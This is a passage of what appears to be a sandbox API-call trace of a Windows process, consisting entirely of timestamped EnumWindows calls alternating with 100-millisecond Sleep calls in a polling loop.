(lpEnumFunc=0x3d23dd0, lParam=0x540000) [0116.052] Sleep (dwMilliseconds=0x64) [0116.161] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0116.161] Sleep (dwMilliseconds=0x64) [0116.317] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0116.317] Sleep (dwMilliseconds=0x64) [0116.444] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0116.444] Sleep (dwMilliseconds=0x64) [0116.551] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0116.551] Sleep (dwMilliseconds=0x64) [0116.660] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0116.661] Sleep (dwMilliseconds=0x64) [0116.770] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0116.770] Sleep (dwMilliseconds=0x64) [0116.886] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0116.887] Sleep (dwMilliseconds=0x64) [0116.989] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0116.989] Sleep (dwMilliseconds=0x64) [0117.115] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0117.115] Sleep (dwMilliseconds=0x64) [0117.223] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0117.223] Sleep (dwMilliseconds=0x64) [0117.364] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0117.364] Sleep (dwMilliseconds=0x64) [0117.474] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0117.475] Sleep (dwMilliseconds=0x64) [0117.583] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0117.583] Sleep (dwMilliseconds=0x64) [0117.723] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0117.723] Sleep (dwMilliseconds=0x64) [0117.836] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0117.837] Sleep (dwMilliseconds=0x64) [0117.949] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0117.950] Sleep (dwMilliseconds=0x64) [0118.051] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0118.052] Sleep (dwMilliseconds=0x64) [0118.165] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0118.165] Sleep (dwMilliseconds=0x64) [0118.285] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0118.286] Sleep (dwMilliseconds=0x64) [0118.394] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0118.395] Sleep (dwMilliseconds=0x64) [0118.504] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0118.504] Sleep (dwMilliseconds=0x64) [0118.646] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0118.646] Sleep (dwMilliseconds=0x64) [0118.754] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0118.754] Sleep (dwMilliseconds=0x64) [0118.864] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0118.864] Sleep (dwMilliseconds=0x64) [0119.007] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0119.008] Sleep (dwMilliseconds=0x64) [0119.113] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0119.113] Sleep (dwMilliseconds=0x64) [0119.223] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0119.223] Sleep (dwMilliseconds=0x64) [0119.333] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0119.333] Sleep (dwMilliseconds=0x64) [0119.441] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0119.442] Sleep (dwMilliseconds=0x64) [0119.566] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0119.567] Sleep (dwMilliseconds=0x64) [0119.677] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0119.677] Sleep (dwMilliseconds=0x64) [0119.785] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0119.786] Sleep (dwMilliseconds=0x64) [0119.931] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0119.931] Sleep (dwMilliseconds=0x64) [0120.041] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0120.041] Sleep (dwMilliseconds=0x64) [0120.158] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0120.158] Sleep (dwMilliseconds=0x64) [0120.259] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0120.259] Sleep (dwMilliseconds=0x64) [0120.369] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0120.369] Sleep (dwMilliseconds=0x64) [0120.478] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0120.478] Sleep (dwMilliseconds=0x64) [0120.587] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0120.588] Sleep (dwMilliseconds=0x64) [0120.714] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0120.714] Sleep (dwMilliseconds=0x64) [0120.829] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0120.830] Sleep (dwMilliseconds=0x64) [0120.939] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0120.939] Sleep (dwMilliseconds=0x64) [0121.050] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0121.050] Sleep (dwMilliseconds=0x64) [0121.158] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0121.158] Sleep (dwMilliseconds=0x64) [0121.284] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0121.284] Sleep (dwMilliseconds=0x64) [0121.396] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0121.396] Sleep (dwMilliseconds=0x64) [0121.501] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0121.501] Sleep (dwMilliseconds=0x64) [0121.611] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0121.611] Sleep (dwMilliseconds=0x64) [0121.721] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0121.721] Sleep (dwMilliseconds=0x64) [0121.877] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0121.877] Sleep (dwMilliseconds=0x64) [0121.986] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0121.986] Sleep (dwMilliseconds=0x64) [0122.104] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0122.104] Sleep (dwMilliseconds=0x64) [0122.258] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0122.259] Sleep (dwMilliseconds=0x64) [0122.360] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0122.361] Sleep (dwMilliseconds=0x64) [0122.502] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0122.502] Sleep (dwMilliseconds=0x64) [0122.611] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0122.611] Sleep (dwMilliseconds=0x64) [0122.744] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0122.744] Sleep (dwMilliseconds=0x64) [0122.845] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0122.845] Sleep (dwMilliseconds=0x64) [0122.954] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0122.955] Sleep (dwMilliseconds=0x64) [0123.065] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0123.065] Sleep (dwMilliseconds=0x64) [0123.173] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0123.173] Sleep (dwMilliseconds=0x64) [0123.282] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0123.283] Sleep (dwMilliseconds=0x64) [0123.409] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0123.410] Sleep (dwMilliseconds=0x64) [0123.517] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0123.517] Sleep (dwMilliseconds=0x64) [0123.626] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0123.626] Sleep (dwMilliseconds=0x64) [0123.767] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0123.768] Sleep (dwMilliseconds=0x64) [0123.878] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0123.878] Sleep (dwMilliseconds=0x64) [0123.986] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0123.986] Sleep (dwMilliseconds=0x64) [0124.128] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0124.128] Sleep (dwMilliseconds=0x64) [0124.236] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0124.236] Sleep (dwMilliseconds=0x64) [0124.345] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0124.345] Sleep (dwMilliseconds=0x64) [0124.486] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0124.487] Sleep (dwMilliseconds=0x64) [0124.596] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0124.596] Sleep (dwMilliseconds=0x64) [0124.704] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0124.704] Sleep (dwMilliseconds=0x64) [0124.815] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0124.815] Sleep (dwMilliseconds=0x64) [0124.924] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0124.925] Sleep (dwMilliseconds=0x64) [0125.052] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0125.053] Sleep (dwMilliseconds=0x64) [0125.164] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0125.164] Sleep (dwMilliseconds=0x64) [0125.302] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0125.302] Sleep (dwMilliseconds=0x64) [0125.456] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0125.456] Sleep (dwMilliseconds=0x64) [0125.568] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0125.568] Sleep (dwMilliseconds=0x64) [0125.751] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0125.805] Sleep (dwMilliseconds=0x64) [0125.913] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0125.913] Sleep (dwMilliseconds=0x64) [0126.018] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0126.018] Sleep (dwMilliseconds=0x64) [0126.127] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0126.128] Sleep (dwMilliseconds=0x64) [0126.238] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0126.238] Sleep (dwMilliseconds=0x64) [0126.347] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0126.347] Sleep (dwMilliseconds=0x64) [0126.488] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0126.488] Sleep (dwMilliseconds=0x64) [0126.598] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0126.598] Sleep (dwMilliseconds=0x64) [0126.708] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0126.709] Sleep (dwMilliseconds=0x64) [0126.815] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0126.815] Sleep (dwMilliseconds=0x64) [0126.925] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0126.925] Sleep (dwMilliseconds=0x64) [0127.050] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0127.050] Sleep (dwMilliseconds=0x64) [0127.159] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0127.159] Sleep (dwMilliseconds=0x64) [0127.288] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0127.288] Sleep (dwMilliseconds=0x64) [0127.402] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0127.402] Sleep (dwMilliseconds=0x64) [0127.518] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0127.519] Sleep (dwMilliseconds=0x64) [0127.644] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0127.644] Sleep (dwMilliseconds=0x64) [0127.753] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0127.753] Sleep (dwMilliseconds=0x64) [0127.891] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0127.891] Sleep (dwMilliseconds=0x64) [0128.003] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0128.003] Sleep (dwMilliseconds=0x64) [0128.113] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0128.113] Sleep (dwMilliseconds=0x64) [0128.284] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0128.285] Sleep (dwMilliseconds=0x64) [0128.403] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0128.403] Sleep (dwMilliseconds=0x64) [0128.518] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0128.519] Sleep (dwMilliseconds=0x64) [0128.630] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0128.630] Sleep (dwMilliseconds=0x64) [0128.737] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0128.737] Sleep (dwMilliseconds=0x64) [0128.848] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0128.848] Sleep (dwMilliseconds=0x64) [0128.956] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0128.957] Sleep (dwMilliseconds=0x64) [0129.067] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.067] Sleep (dwMilliseconds=0x64) [0129.222] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.222] Sleep (dwMilliseconds=0x64) [0129.331] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.331] Sleep (dwMilliseconds=0x64) [0129.472] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.473] Sleep (dwMilliseconds=0x64) [0129.628] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.628] Sleep (dwMilliseconds=0x64) [0129.664] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.664] Sleep (dwMilliseconds=0x64) [0129.694] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.694] Sleep (dwMilliseconds=0x64) [0129.706] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.706] Sleep (dwMilliseconds=0x64) [0129.722] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.723] Sleep (dwMilliseconds=0x64) [0129.737] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.737] Sleep (dwMilliseconds=0x64) [0129.754] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.755] Sleep (dwMilliseconds=0x64) [0129.817] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.818] Sleep (dwMilliseconds=0x64) [0129.859] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.859] Sleep (dwMilliseconds=0x64) [0129.863] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.863] Sleep (dwMilliseconds=0x64) [0129.878] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.879] Sleep (dwMilliseconds=0x64) [0129.881] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.881] Sleep (dwMilliseconds=0x64) [0129.883] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.883] Sleep (dwMilliseconds=0x64) [0129.887] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.888] Sleep (dwMilliseconds=0x64) [0129.890] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.891] Sleep (dwMilliseconds=0x64) [0129.896] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.896] Sleep (dwMilliseconds=0x64) [0129.898] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.898] Sleep (dwMilliseconds=0x64) [0129.900] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.900] Sleep (dwMilliseconds=0x64) [0129.902] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.902] Sleep (dwMilliseconds=0x64) [0129.907] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.907] Sleep (dwMilliseconds=0x64) [0129.908] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.909] Sleep (dwMilliseconds=0x64) [0129.911] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.911] Sleep (dwMilliseconds=0x64) [0129.912] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.913] Sleep (dwMilliseconds=0x64) [0129.916] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.916] Sleep (dwMilliseconds=0x64) [0129.933] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.933] Sleep (dwMilliseconds=0x64) [0129.951] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0129.951] Sleep (dwMilliseconds=0x64) [0130.013] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.014] Sleep (dwMilliseconds=0x64) [0130.061] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.061] Sleep (dwMilliseconds=0x64) [0130.074] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.074] Sleep (dwMilliseconds=0x64) [0130.089] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.089] Sleep (dwMilliseconds=0x64) [0130.122] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.122] Sleep (dwMilliseconds=0x64) [0130.136] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.136] Sleep (dwMilliseconds=0x64) [0130.153] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.154] Sleep (dwMilliseconds=0x64) [0130.217] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.217] Sleep (dwMilliseconds=0x64) [0130.264] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.264] Sleep (dwMilliseconds=0x64) [0130.277] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.278] Sleep (dwMilliseconds=0x64) [0130.292] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.292] Sleep (dwMilliseconds=0x64) [0130.310] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.310] Sleep (dwMilliseconds=0x64) [0130.323] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.323] Sleep (dwMilliseconds=0x64) [0130.339] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.340] Sleep (dwMilliseconds=0x64) [0130.356] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.357] Sleep (dwMilliseconds=0x64) [0130.370] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.370] Sleep (dwMilliseconds=0x64) [0130.386] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.386] Sleep (dwMilliseconds=0x64) [0130.433] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.433] Sleep (dwMilliseconds=0x64) [0130.461] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.462] Sleep (dwMilliseconds=0x64) [0130.463] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.464] Sleep (dwMilliseconds=0x64) [0130.479] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.480] Sleep (dwMilliseconds=0x64) [0130.495] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.495] Sleep (dwMilliseconds=0x64) [0130.558] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.558] Sleep (dwMilliseconds=0x64) [0130.620] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.620] Sleep (dwMilliseconds=0x64) [0130.641] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.642] Sleep (dwMilliseconds=0x64) [0130.652] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.652] Sleep (dwMilliseconds=0x64) [0130.667] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.667] Sleep (dwMilliseconds=0x64) [0130.689] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.689] Sleep (dwMilliseconds=0x64) [0130.727] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.728] Sleep (dwMilliseconds=0x64) [0130.729] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.730] Sleep (dwMilliseconds=0x64) [0130.792] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.792] Sleep (dwMilliseconds=0x64) [0130.842] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.843] Sleep (dwMilliseconds=0x64) [0130.854] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.855] Sleep (dwMilliseconds=0x64) [0130.870] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.870] Sleep (dwMilliseconds=0x64) [0130.888] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.888] Sleep (dwMilliseconds=0x64) [0130.949] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.949] Sleep (dwMilliseconds=0x64) [0130.995] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0130.995] Sleep (dwMilliseconds=0x64) [0131.587] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0131.588] Sleep (dwMilliseconds=0x64) [0131.677] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0131.678] Sleep (dwMilliseconds=0x64) [0131.971] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0131.971] Sleep (dwMilliseconds=0x64) [0132.026] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0132.029] Sleep (dwMilliseconds=0x64) [0132.168] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0132.169] Sleep (dwMilliseconds=0x64) [0132.824] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0132.824] Sleep (dwMilliseconds=0x64) [0133.023] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0133.023] Sleep (dwMilliseconds=0x64) [0133.120] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0133.120] Sleep (dwMilliseconds=0x64) [0133.250] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0133.251] Sleep (dwMilliseconds=0x64) [0133.386] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0133.386] Sleep (dwMilliseconds=0x64) [0133.606] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0133.608] Sleep (dwMilliseconds=0x64) [0133.735] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0133.735] Sleep (dwMilliseconds=0x64) [0133.808] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0133.808] Sleep (dwMilliseconds=0x64) [0133.829] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0133.829] Sleep (dwMilliseconds=0x64) [0133.844] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0133.844] Sleep (dwMilliseconds=0x64) [0133.870] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0133.871] Sleep (dwMilliseconds=0x64) [0133.990] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0133.991] Sleep (dwMilliseconds=0x64) [0134.064] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.065] Sleep (dwMilliseconds=0x64) [0134.124] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.124] Sleep (dwMilliseconds=0x64) [0134.136] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.136] Sleep (dwMilliseconds=0x64) [0134.151] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.151] Sleep (dwMilliseconds=0x64) [0134.191] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.192] Sleep (dwMilliseconds=0x64) [0134.198] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.199] Sleep (dwMilliseconds=0x64) [0134.213] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.214] Sleep (dwMilliseconds=0x64) [0134.281] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.281] Sleep (dwMilliseconds=0x64) [0134.370] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.370] Sleep (dwMilliseconds=0x64) [0134.403] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.403] Sleep (dwMilliseconds=0x64) [0134.417] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.417] Sleep (dwMilliseconds=0x64) [0134.433] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.433] Sleep (dwMilliseconds=0x64) [0134.452] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.452] Sleep (dwMilliseconds=0x64) [0134.464] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.464] Sleep (dwMilliseconds=0x64) [0134.528] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.529] Sleep (dwMilliseconds=0x64) [0134.599] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.599] Sleep (dwMilliseconds=0x64) [0134.640] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.640] Sleep (dwMilliseconds=0x64) [0134.678] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.679] Sleep (dwMilliseconds=0x64) [0134.696] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.696] Sleep (dwMilliseconds=0x64) [0134.699] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.699] Sleep (dwMilliseconds=0x64) [0134.714] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.714] Sleep (dwMilliseconds=0x64) [0134.795] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.795] Sleep (dwMilliseconds=0x64) [0134.937] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.937] Sleep (dwMilliseconds=0x64) [0134.985] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0134.985] Sleep (dwMilliseconds=0x64) [0134.996] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.000] Sleep (dwMilliseconds=0x64) [0135.010] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.011] Sleep (dwMilliseconds=0x64) [0135.031] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.031] Sleep (dwMilliseconds=0x64) [0135.042] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.042] Sleep (dwMilliseconds=0x64) [0135.057] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.058] Sleep (dwMilliseconds=0x64) [0135.073] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.073] Sleep (dwMilliseconds=0x64) [0135.139] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.139] Sleep (dwMilliseconds=0x64) [0135.172] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.173] Sleep (dwMilliseconds=0x64) [0135.186] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.186] Sleep (dwMilliseconds=0x64) [0135.198] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.198] Sleep (dwMilliseconds=0x64) [0135.218] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.219] Sleep (dwMilliseconds=0x64) [0135.233] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.233] Sleep (dwMilliseconds=0x64) [0135.249] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.250] Sleep (dwMilliseconds=0x64) [0135.342] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.343] Sleep (dwMilliseconds=0x64) [0135.389] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.389] Sleep (dwMilliseconds=0x64) [0135.425] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0135.426] Sleep (dwMilliseconds=0x64) [0135.433] EnumWindows (lpEnumFunc=0x3d23dd0, 